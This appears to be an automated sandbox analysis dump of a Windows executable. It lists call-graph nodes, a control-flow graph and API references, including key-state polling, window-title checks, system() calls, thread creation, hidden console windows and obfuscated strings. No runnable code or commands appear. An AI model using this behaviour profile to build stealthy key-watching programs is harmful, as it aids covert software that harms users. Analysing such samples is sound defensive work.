7ff60c47db89 4023->4025 4026 7ff60c47dac5 4028 7ff60c482744 __std_fs_convert_narrow_to_wide 2 API calls 4026->4028 4029 7ff60c47db46 4028->4029 4029->4018 4064 7ff60c472830 4029->4064 4032 7ff60c47e44f 4031->4032 4082 7ff60c482858 4032->4082 4035 7ff60c47e501 4036 7ff60c482bf0 8 API calls 4035->4036 4037 7ff60c47e514 4036->4037 4037->3965 4037->3967 4037->3970 4038 7ff60c47e534 GetAsyncKeyState 4038->4038 4039 7ff60c47e521 4038->4039 4039->4038 4120 7ff60c474e40 4039->4120 4042 7ff60c48276e GetLastError 4041->4042 4043 7ff60c47daaa 4041->4043 4042->4043 4043->4022 4043->4026 4044 7ff60c480610 4043->4044 4045 7ff60c4807b1 4044->4045 4050 7ff60c48063f 4044->4050 4072 7ff60c472140 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 4045->4072 4047 7ff60c4807b6 4053 7ff60c4720a0 Concurrency::cancel_current_task __std_exception_copy 4047->4053 4048 7ff60c4806ed 4052 7ff60c482c10 3 API calls 4048->4052 4049 7ff60c4806c1 4049->4047 4051 7ff60c4806ce 4049->4051 4050->4047 4050->4048 4050->4049 4056 7ff60c4806a5 4050->4056 4054 7ff60c482c10 3 API calls 4051->4054 4052->4056 4055 7ff60c4807bc 4053->4055 4054->4056 4057 7ff60c48076b memcpy 4056->4057 4058 7ff60c48070e memcpy 4056->4058 4060 7ff60c480764 _invalid_parameter_noinfo_noreturn 4056->4060 4059 7ff60c480762 4057->4059 4061 7ff60c48071e 4058->4061 4059->4026 4060->4057 4061->4060 4062 7ff60c480757 4061->4062 4063 7ff60c482f5c free 4062->4063 4063->4059 4065 7ff60c472840 4064->4065 4073 7ff60c472460 4065->4073 4069 7ff60c47255e 4068->4069 4070 7ff60c472460 11 API calls 4069->4070 4071 7ff60c472575 _CxxThrowException __std_exception_copy 4070->4071 4071->4022 4072->4047 4074 7ff60c472496 __std_exception_copy 4073->4074 4075 7ff60c47251a 4074->4075 4077 7ff60c4724e5 4074->4077 4076 7ff60c482bf0 8 API calls 4075->4076 4079 7ff60c47253b _CxxThrowException 4076->4079 4078 7ff60c472515 4077->4078 4080 7ff60c47250e _invalid_parameter_noinfo_noreturn 4077->4080 4081 7ff60c482f5c free 4078->4081 4080->4078 4081->4075 4086 7ff60c48289a 4082->4086 4083 7ff60c4828a3 4084 7ff60c482bf0 8 API calls 4083->4084 4087 7ff60c47e468 4084->4087 4085 7ff60c4829b5 4125 7ff60c482b80 CreateFileW 4085->4125 4086->4083 4086->4085 4089 7ff60c4828fb GetFileAttributesExW 4086->4089 4087->4035 4087->4039 4090 7ff60c48290f GetLastError 4089->4090 4093 7ff60c482960 4089->4093 4090->4083 4092 7ff60c48291e FindFirstFileW 4090->4092 4098 7ff60c48293d FindClose 4092->4098 4099 7ff60c482932 GetLastError 4092->4099 4093->4083 4093->4085 4094 7ff60c4829fe 4096 7ff60c482a0d GetFileInformationByHandleEx 4094->4096 4097 7ff60c482aaf 4094->4097 4095 7ff60c4829de 4100 7ff60c4829e9 CloseHandle 4095->4100 4101 7ff60c4829f7 4095->4101 4102 7ff60c482a27 GetLastError 4096->4102 4103 7ff60c482a50 4096->4103 4105 7ff60c482b0a 4097->4105 4106 7ff60c482aca GetFileInformationByHandleEx 4097->4106 4098->4093 4099->4083 4100->4101 4104 7ff60c482b70 abort 4100->4104 4101->4083 4102->4101 4108 7ff60c482a35 CloseHandle 4102->4108 4103->4097 4114 7ff60c482a71 GetFileInformationByHandleEx 4103->4114 4104->4101 4109 7ff60c482b5d 4105->4109 4110 7ff60c482b21 4105->4110 4106->4105 4107 7ff60c482ae0 GetLastError 4106->4107 4107->4101 4111 7ff60c482af2 CloseHandle 4107->4111 4108->4101 4112 7ff60c482a42 abort 4108->4112 4109->4101 4115 7ff60c482b63 CloseHandle 4109->4115 4110->4083 4113 7ff60c482b27 CloseHandle 4110->4113 4111->4101 4116 7ff60c482b03 abort 4111->4116 4112->4101 4113->4083 4113->4104 4114->4097 4117 7ff60c482a8d GetLastError 4114->4117 4115->4101 4115->4104 4116->4105 4117->4101 4118 7ff60c482a9b CloseHandle 4117->4118 4118->4101 4119 7ff60c482aa8 abort 4118->4119 4119->4097 4121 7ff60c474e92 system 4120->4121 4123 7ff60c47503a system 4121->4123 4123->4039 4126 7ff60c4829d8 4125->4126 4127 7ff60c482bc2 GetLastError 4125->4127 4126->4094 4126->4095 4127->4126 4128 7ff60c47d9f0 4129 7ff60c47d9f4 GetAsyncKeyState 4128->4129 4129->4129 4130 7ff60c47da00 4129->4130 4130->4129 4132 7ff60c47b6d0 4130->4132 4133 7ff60c47b783 FindWindowA 4132->4133 4135 7ff60c47b8da FindWindowA 4133->4135 4136 7ff60c47b8d5 4133->4136 4139 7ff60c47ba8a FindWindowA 4135->4139 4140 7ff60c47ba85 4135->4140 4137 7ff60c475ee0 7 API calls 4136->4137 4137->4135 4143 7ff60c47bc6a FindWindowA 4139->4143 4144 7ff60c47bc65 4139->4144 4141 7ff60c475ee0 7 API calls 4140->4141 4141->4139 4147 7ff60c47bdfa FindWindowA 4143->4147 4148 7ff60c47bdf5 4143->4148 4145 7ff60c475ee0 7 API calls 4144->4145 4145->4143 4150 7ff60c47be49 FindWindowA 4147->4150 4151 7ff60c47be44 4147->4151 4149 7ff60c475ee0 7 API calls 4148->4149 4149->4147 4153 7ff60c47be97 FindWindowA 4150->4153 4154 7ff60c47be92 4150->4154 4152 7ff60c4751c0 14 API calls 4151->4152 4152->4150 4157 7ff60c47c06a FindWindowA 4153->4157 4158 7ff60c47c065 4153->4158 4155 7ff60c4751c0 14 API calls 4154->4155 4155->4153 4159 7ff60c47c0ac FindWindowA 4157->4159 4160 7ff60c47c0a7 4157->4160 4161 7ff60c4751c0 14 API calls 4158->4161 4164 7ff60c47c2ea FindWindowA 4159->4164 4165 7ff60c47c2e5 4159->4165 4162 7ff60c4751c0 14 API calls 4160->4162 4161->4157 4162->4159 4168 7ff60c47c3ab 4164->4168 4169 7ff60c47c3b0 4164->4169 4166 7ff60c475ee0 7 API calls 4165->4166 4166->4164 4170 7ff60c4751c0 14 API calls 4168->4170 4170->4169 4489 7ff60c4831f0 4492 7ff60c483944 4489->4492 4493 7ff60c4831f9 4492->4493 4494 7ff60c483967 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 4492->4494 4494->4493 4625 7ff60c47b26e 4626 7ff60c47b28a system 4625->4626 4627 7ff60c47b260 4625->4627 4628 7ff60c47b2c1 system 4626->4628 4627->4625 4630 7ff60c47b439 4628->4630 4631 7ff60c47b68f system 4628->4631 4632 7ff60c483058 4636 7ff60c4838d0 SetUnhandledExceptionFilter 4632->4636 4637 7ff60c472660 ?_Syserror_map@std@@YAPEBDH 4638 7ff60c472690 4637->4638 4638->4638 4639 7ff60c480510 8 API calls 4638->4639 4640 7ff60c4726a5 4639->4640 4495 7ff60c4841e0 4496 7ff60c4841f3 4495->4496 4497 7ff60c484200 4495->4497 4498 7ff60c472890 3 API calls 4496->4498 4498->4497 4641 7ff60c47de60 4642 7ff60c48271c __std_fs_code_page 2 API calls 4641->4642 4643 7ff60c47dec4 4642->4643 4672 7ff60c47fe10 4643->4672 4646 7ff60c47fe10 28 API calls 4647 7ff60c47df2c 4646->4647 4690 7ff60c47f680 4647->4690 4649 7ff60c47df54 4702 7ff60c47f890 4649->4702 4651 7ff60c47df63 4652 7ff60c47f890 11 API calls 4651->4652 4653 7ff60c47df78 4652->4653 4654 7ff60c47f890 11 API calls 4653->4654 4655 7ff60c47df92 4654->4655 4656 7ff60c47dfc5 4655->4656 4657 7ff60c47f890 11 API calls 4655->4657 4662 7ff60c47dfd2 4656->4662 4708 7ff60c4807c0 4656->4708 4659 7ff60c47dfab 4657->4659 4660 7ff60c47f890 11 API calls 4659->4660 4660->4656 4661 7ff60c47e038 4664 7ff60c47e086 4661->4664 4668 7ff60c47e081 4661->4668 4671 7ff60c47e07a _invalid_parameter_noinfo_noreturn 4661->4671 4662->4661 4663 7ff60c47e033 4662->4663 4666 7ff60c47e02c _invalid_parameter_noinfo_noreturn 4662->4666 4667 7ff60c482f5c free 4663->4667 4665 7ff60c482bf0 8 API calls 4664->4665 4670 7ff60c47e095 4665->4670 4666->4663 4667->4661 4669 7ff60c482f5c free 4668->4669 4669->4664 4671->4668 4673 7ff60c47def9 4672->4673 4674 7ff60c47fe60 4672->4674 4673->4646 4675 7ff60c47ff51 4674->4675 4728 7ff60c48278c WideCharToMultiByte 4674->4728 4677 7ff60c472550 13 API calls 4675->4677 4679 7ff60c47ff57 4677->4679 4680 7ff60c472830 12 API calls 4679->4680 4683 7ff60c47ff63 4680->4683 4681 7ff60c47fecc memset 4686 7ff60c47fea0 4681->4686 4682 7ff60c47fef3 4734 7ff60c480930 4682->4734 4687 7ff60c48278c 4 API calls 4686->4687 4688 7ff60c47ff20 4687->4688 4688->4673 4689 7ff60c472830 12 API calls 4688->4689 4689->4675 4691 7ff60c47f696 4690->4691 4701 7ff60c47f708 4690->4701 4692 7ff60c47f6b8 4691->4692 4693 7ff60c47f6a1 4691->4693 4691->4701 4696 7ff60c47f6c4 memcpy 4692->4696 4692->4701 4755 7ff60c4803c0 4693->4755 4697 7ff60c47f6e8 4696->4697 4698 7ff60c47f6fd 4696->4698 4697->4698 4699 7ff60c47f720 _invalid_parameter_noinfo_noreturn 4697->4699 4700 7ff60c482f5c free 4698->4700 4700->4701 4701->4649 4703 7ff60c47f8b3 memcpy 4702->4703 4704 7ff60c47f8f2 4702->4704 4703->4651 4776 7ff60c480ac0 4704->4776 4709 7ff60c480915 4708->4709 4712 7ff60c4807ef 4708->4712 4798 7ff60c472140 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 4709->4798 4711 7ff60c48091a 4714 7ff60c4720a0 Concurrency::cancel_current_task __std_exception_copy 4711->4714 4715 7ff60c480847 4712->4715 4716 7ff60c48087f 4712->4716 4721 7ff60c480854 4712->4721 4722 7ff60c48083a 4712->4722 4713 7ff60c482c10 3 API calls 4713->4722 4718 7ff60c480920 4714->4718 4715->4711 4715->4721 4717 7ff60c482c10 3 API calls 4716->4717 4717->4722 4719 7ff60c48089b memcpy 4724 7ff60c4808bc 4719->4724 4725 7ff60c4808d1 4719->4725 4720 7ff60c4808e5 memcpy 4726 7ff60c4808dc 4720->4726 4721->4713 4722->4719 4722->4720 4723 7ff60c4808de _invalid_parameter_noinfo_noreturn 4722->4723 4723->4720 4724->4723 4724->4725 4727 7ff60c482f5c free 4725->4727 4726->4662 4727->4726 4729 7ff60c4827eb 4728->4729 4730 7ff60c4827e3 GetLastError 4728->4730 4731 7ff60c4827f8 WideCharToMultiByte 4729->4731 4732 7ff60c47fe85 4729->4732 4730->4729 4731->4732 4733 7ff60c482826 GetLastError 4731->4733 4732->4679 4732->4681 4732->4682 4732->4686 4733->4732 4735 7ff60c480aa7 4734->4735 4738 7ff60c48095d 4734->4738 4754 7ff60c472140 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 4735->4754 4737 7ff60c480aac 4740 7ff60c4720a0 Concurrency::cancel_current_task __std_exception_copy 4737->4740 4741 7ff60c4809ba 4738->4741 4742 7ff60c4809f2 4738->4742 4746 7ff60c4809c7 4738->4746 4747 7ff60c4809ad 4738->4747 4739 7ff60c482c10 3 API calls 4739->4747 4743 7ff60c480ab2 4740->4743 4741->4737 4741->4746 4749 7ff60c482c10 3 API calls 4742->4749 4744 7ff60c480a69 memcpy 4753 7ff60c480a60 4744->4753 4745 7ff60c480a16 memcpy memset 4750 7ff60c480a55 4745->4750 4751 7ff60c480a40 4745->4751 4746->4739 4747->4744 4747->4745 4748 7ff60c480a62 _invalid_parameter_noinfo_noreturn 4747->4748 4748->4744 4749->4747 4752 7ff60c482f5c free 4750->4752 4751->4748 4751->4750 4752->4753 4753->4686 4754->4737 4756 7ff60c4804fd 4755->4756 4759 7ff60c4803e9 4755->4759 4775 7ff60c472140 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 4756->4775 4758 7ff60c480502 4761 7ff60c4720a0 Concurrency::cancel_current_task __std_exception_copy 4758->4761 4762 7ff60c480479 4759->4762 4763 7ff60c480441 4759->4763 4768 7ff60c48044e 4759->4768 4769 7ff60c480434 4759->4769 4760 7ff60c482c10 3 API calls 4760->4769 4765 7ff60c480508 4761->4765 4764 7ff60c482c10 3 API calls 4762->4764 4763->4758 4763->4768 4764->4769 4766 7ff60c4804d7 memcpy 4773 7ff60c47f6a9 4766->4773 4767 7ff60c480496 memcpy 4771 7ff60c4804c3 4767->4771 4772 7ff60c4804ae 4767->4772 4768->4760 4769->4766 4769->4767 4770 7ff60c4804d0 _invalid_parameter_noinfo_noreturn 4769->4770 4770->4766 4774 7ff60c482f5c free 4771->4774 4772->4770 4772->4771 4773->4649 4774->4773 4775->4758 4777 7ff60c480c43 4776->4777 4781 7ff60c480aee 4776->4781 4797 7ff60c472140 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 4777->4797 4779 7ff60c480b58 4782 7ff60c482c10 3 API calls 4779->4782 4780 7ff60c480c48 4783 7ff60c4720a0 Concurrency::cancel_current_task __std_exception_copy 4780->4783 4781->4779 4784 7ff60c480b4b 4781->4784 4785 7ff60c480b87 4781->4785 4786 7ff60c480b3e 4781->4786 4782->4786 4789 7ff60c480c4e 4783->4789 4784->4779 4784->4780 4788 7ff60c482c10 3 API calls 4785->4788 4787 7ff60c480bfc _invalid_parameter_noinfo_noreturn 4786->4787 4790 7ff60c480c03 4786->4790 4791 7ff60c480baf memcpy memcpy 4786->4791 4787->4790 4788->4786 4795 7ff60c480c0b memcpy 4790->4795 4792 7ff60c480bda 4791->4792 4793 7ff60c480bef 4791->4793 4792->4787 4792->4793 4794 7ff60c482f5c free 4793->4794 4796 7ff60c47f905 4794->4796 4795->4796 4796->4651 4797->4780 4798->4711 4878 7ff60c4838e0 4879 7ff60c483914 4878->4879 4880 7ff60c4838f8 4878->4880 4880->4879 4881 7ff60c483afa free 4880->4881
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system
                                                                                                                                                                                                                                                                                      • String ID: `s|euE$botbT$jg|j\$nwcS$nwcS$nwcS$pclueU$xkd}m]
                                                                                                                                                                                                                                                                                      • API String ID: 3377271179-1152981203
                                                                                                                                                                                                                                                                                      • Opcode ID: 886ec20fcf79ed83b8f10a0381ed5d7f7a544ad655b79ecb643c041b363ec313
                                                                                                                                                                                                                                                                                      • Instruction ID: a915edd7d97eef950aaa09b4db117ad922e5a6a25ebbfb9a6111382df4606992
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 886ec20fcf79ed83b8f10a0381ed5d7f7a544ad655b79ecb643c041b363ec313
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB93B92AE2FB864BF7039B3680114E8E3646FB7289791D723FD1475952FF6A71C28244

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 278 7ff60c47e550-7ff60c47e61a 279 7ff60c47e620-7ff60c47e628 278->279 279->279 280 7ff60c47e62a-7ff60c47e69f call 7ff60c480510 SetConsoleTitleA 279->280 283 7ff60c47e749-7ff60c47e77b GetConsoleWindow ShowWindow 280->283 284 7ff60c47e6a5-7ff60c47e6ac 280->284 289 7ff60c47e889-7ff60c47e8c1 system 283->289 290 7ff60c47e781-7ff60c47e788 283->290 285 7ff60c47e710-7ff60c47e715 284->285 286 7ff60c47e6ae-7ff60c47e70e 284->286 287 7ff60c47e720-7ff60c47e747 285->287 286->283 287->283 287->287 291 7ff60c47e8c7-7ff60c47e9ff 289->291 292 7ff60c47ea05-7ff60c47ea15 289->292 293 7ff60c47e858-7ff60c47e85d 290->293 294 7ff60c47e78e-7ff60c47e856 290->294 291->292 295 7ff60c47ea20-7ff60c47ea55 292->295 296 7ff60c47e860-7ff60c47e887 293->296 294->289 295->295 297 7ff60c47ea57-7ff60c47ea73 SetConsoleTitleW 295->297 296->289 296->296 298 7ff60c47eb19-7ff60c47eb86 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A call 7ff60c480510 297->298 299 7ff60c47ea79-7ff60c47ea80 297->299 305 7ff60c47eb88 298->305 306 7ff60c47ebbe-7ff60c47ebc2 298->306 300 7ff60c47eae4-7ff60c47eae9 299->300 301 7ff60c47ea82-7ff60c47eae2 299->301 303 7ff60c47eaf0-7ff60c47eb17 300->303 301->298 303->298 303->303 309 7ff60c47eb91-7ff60c47ebb1 call 7ff60c47f980 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff60c47fb60 305->309 307 7ff60c47ebf5-7ff60c47ec72 CreateThread * 2 SleepEx CreateThread * 2 306->307 308 7ff60c47ebc4-7ff60c47ebd2 306->308 312 7ff60c47ec78-7ff60c47ec9d GetConsoleWindow ShowWindow 307->312 310 7ff60c47ebed-7ff60c47ebf0 call 7ff60c482f5c 308->310 311 7ff60c47ebd4-7ff60c47ebe7 308->311 323 7ff60c47ebb6-7ff60c47ebbc 309->323 310->307 311->310 314 7ff60c47f543-7ff60c47f549 _invalid_parameter_noinfo_noreturn 311->314 316 7ff60c47ed45-7ff60c47ee15 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A call 7ff60c47ff70 call 7ff60c480240 call 7ff60c47f560 call 7ff60c47ff70 call 7ff60c480240 call 7ff60c47f560 call 7ff60c480510 312->316 317 7ff60c47eca3-7ff60c47ecaa 312->317 338 7ff60c47ee4d-7ff60c47ee51 316->338 339 7ff60c47ee17 316->339 319 7ff60c47ecac-7ff60c47ed0c 317->319 320 7ff60c47ed0e-7ff60c47ed17 317->320 319->316 324 7ff60c47ed20-7ff60c47ed43 320->324 323->306 323->309 324->316 324->324 340 7ff60c47ee84-7ff60c47ef0d call 7ff60c47ff70 call 7ff60c480240 call 7ff60c47f560 call 7ff60c480510 338->340 341 7ff60c47ee53-7ff60c47ee61 338->341 342 7ff60c47ee20-7ff60c47ee40 call 7ff60c47f980 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff60c47fb60 339->342 358 7ff60c47ef4d-7ff60c47ef51 340->358 359 7ff60c47ef0f-7ff60c47ef18 340->359 343 7ff60c47ee7c-7ff60c47ee7f call 7ff60c482f5c 341->343 344 7ff60c47ee63-7ff60c47ee76 341->344 352 7ff60c47ee45-7ff60c47ee4b 342->352 343->340 344->314 344->343 352->338 352->342 361 7ff60c47ef84-7ff60c47f00d call 7ff60c47ff70 call 7ff60c480240 call 7ff60c47f560 call 7ff60c480510 358->361 362 7ff60c47ef53-7ff60c47ef61 358->362 360 7ff60c47ef20-7ff60c47ef40 call 7ff60c47f980 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff60c47fb60 359->360 372 7ff60c47ef45-7ff60c47ef4b 360->372 378 7ff60c47f04d-7ff60c47f051 361->378 379 7ff60c47f00f-7ff60c47f018 361->379 364 7ff60c47ef7c-7ff60c47ef7f call 7ff60c482f5c 362->364 365 7ff60c47ef63-7ff60c47ef76 362->365 364->361 365->314 365->364 372->358 372->360 381 7ff60c47f084-7ff60c47f173 call 7ff60c47ff70 call 7ff60c480240 call 7ff60c47f560 call 7ff60c47ff70 call 7ff60c480240 call 7ff60c47f560 call 7ff60c47ff70 call 7ff60c480240 call 7ff60c47f560 call 7ff60c480510 378->381 382 7ff60c47f053-7ff60c47f061 378->382 380 7ff60c47f020-7ff60c47f040 call 7ff60c47f980 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff60c47fb60 379->380 393 7ff60c47f045-7ff60c47f04b 380->393 410 7ff60c47f1ad-7ff60c47f1b1 381->410 411 7ff60c47f175-7ff60c47f17e 381->411 384 7ff60c47f07c-7ff60c47f07f call 7ff60c482f5c 382->384 385 7ff60c47f063-7ff60c47f076 382->385 384->381 385->314 385->384 393->378 393->380 413 7ff60c47f1e4-7ff60c47f26d call 7ff60c47ff70 call 7ff60c480240 call 7ff60c47f560 call 7ff60c480510 410->413 414 7ff60c47f1b3-7ff60c47f1c1 410->414 412 7ff60c47f180-7ff60c47f1a0 call 7ff60c47f980 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff60c47fb60 411->412 425 7ff60c47f1a5-7ff60c47f1ab 412->425 430 7ff60c47f2ad-7ff60c47f2b1 413->430 431 7ff60c47f26f-7ff60c47f278 413->431 416 7ff60c47f1dc-7ff60c47f1df call 7ff60c482f5c 414->416 417 7ff60c47f1c3-7ff60c47f1d6 414->417 416->413 417->314 417->416 425->410 425->412 433 7ff60c47f2e4-7ff60c47f36d call 7ff60c47ff70 call 7ff60c480240 call 7ff60c47f560 call 7ff60c480510 430->433 434 7ff60c47f2b3-7ff60c47f2c1 430->434 432 7ff60c47f280-7ff60c47f2a0 call 7ff60c47f980 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff60c47fb60 431->432 445 7ff60c47f2a5-7ff60c47f2ab 432->445 450 7ff60c47f3ad-7ff60c47f3b1 433->450 451 7ff60c47f36f-7ff60c47f378 433->451 437 7ff60c47f2dc-7ff60c47f2df call 7ff60c482f5c 434->437 438 7ff60c47f2c3-7ff60c47f2d6 434->438 437->433 438->314 438->437 445->430 445->432 452 7ff60c47f3e4-7ff60c47f403 call 7ff60c47ff70 call 7ff60c480240 450->452 453 7ff60c47f3b3-7ff60c47f3c1 450->453 454 7ff60c47f380-7ff60c47f3a0 call 7ff60c47f980 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff60c47fb60 451->454 465 7ff60c47f408-7ff60c47f420 call 7ff60c47f560 GetAsyncKeyState 452->465 455 7ff60c47f3dc-7ff60c47f3df call 7ff60c482f5c 453->455 456 7ff60c47f3c3-7ff60c47f3d6 453->456 464 7ff60c47f3a5-7ff60c47f3ab 454->464 455->452 456->314 456->455 464->450 464->454 468 7ff60c47f444-7ff60c47f4c0 Beep call 7ff60c472c10 GetConsoleWindow ShowWindow call 7ff60c480510 465->468 469 7ff60c47f422-7ff60c47f42f GetAsyncKeyState 465->469 478 7ff60c47f4fd-7ff60c47f501 468->478 479 7ff60c47f4c2-7ff60c47f4cb 468->479 471 7ff60c47f539-7ff60c47f53e call 7ff60c473680 469->471 472 7ff60c47f435-7ff60c47f442 GetAsyncKeyState 469->472 471->312 472->468 472->469 478->312 481 7ff60c47f507-7ff60c47f515 478->481 480 7ff60c47f4d0-7ff60c47f4fb call 7ff60c47f980 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff60c47fb60 479->480 480->478 483 7ff60c47f52c-7ff60c47f534 call 7ff60c482f5c 481->483 484 7ff60c47f517-7ff60c47f52a 481->484 483->312 484->314 484->483
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetConsoleTitleA.KERNEL32 ref: 00007FF60C47E653
                                                                                                                                                                                                                                                                                      • GetConsoleWindow.KERNELBASE ref: 00007FF60C47E74E
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32 ref: 00007FF60C47E762
                                                                                                                                                                                                                                                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF60C47E88E
                                                                                                                                                                                                                                                                                      • SetConsoleTitleW.KERNEL32 ref: 00007FF60C47EA5C
                                                                                                                                                                                                                                                                                      • ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A.MSVCP140 ref: 00007FF60C47EB1E
                                                                                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF60C47EBA6
                                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE ref: 00007FF60C47EC0D
                                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE ref: 00007FF60C47EC2B
                                                                                                                                                                                                                                                                                      • SleepEx.KERNELBASE ref: 00007FF60C47EC36
                                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE ref: 00007FF60C47EC54
                                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE ref: 00007FF60C47EC72
                                                                                                                                                                                                                                                                                      • GetConsoleWindow.KERNELBASE ref: 00007FF60C47EC78
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32 ref: 00007FF60C47EC86
                                                                                                                                                                                                                                                                                      • ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A.MSVCP140 ref: 00007FF60C47ED4A
                                                                                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF60C47EE35
                                                                                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF60C47EF35
                                                                                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF60C47F195
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C47F980: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(00007FF821A66000,?,0000006E00000006,?,?,00007FF60C472DAB), ref: 00007FF60C47FA54
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C47F980: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(00007FF821A66000,?,0000006E00000006,?,?,00007FF60C472DAB), ref: 00007FF60C47FA7D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C47F980: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF60C47FAAF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C47F980: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(00007FF821A66000,?,0000006E00000006,?,?,00007FF60C472DAB), ref: 00007FF60C47FAF3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C47F980: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF60C47FAFA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C47F980: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF60C47FB07
                                                                                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF60C47F035
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C47FB60: Sleep.KERNEL32(?,?,?,00007FF60C472DC4), ref: 00007FF60C47FC0A
                                                                                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF60C47F295
                                                                                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF60C47F395
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32 ref: 00007FF60C47F418
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32 ref: 00007FF60C47F427
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32 ref: 00007FF60C47F43A
                                                                                                                                                                                                                                                                                      • Beep.KERNEL32 ref: 00007FF60C47F44B
                                                                                                                                                                                                                                                                                      • GetConsoleWindow.KERNEL32 ref: 00007FF60C47F456
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32 ref: 00007FF60C47F464
                                                                                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF60C47F4E5
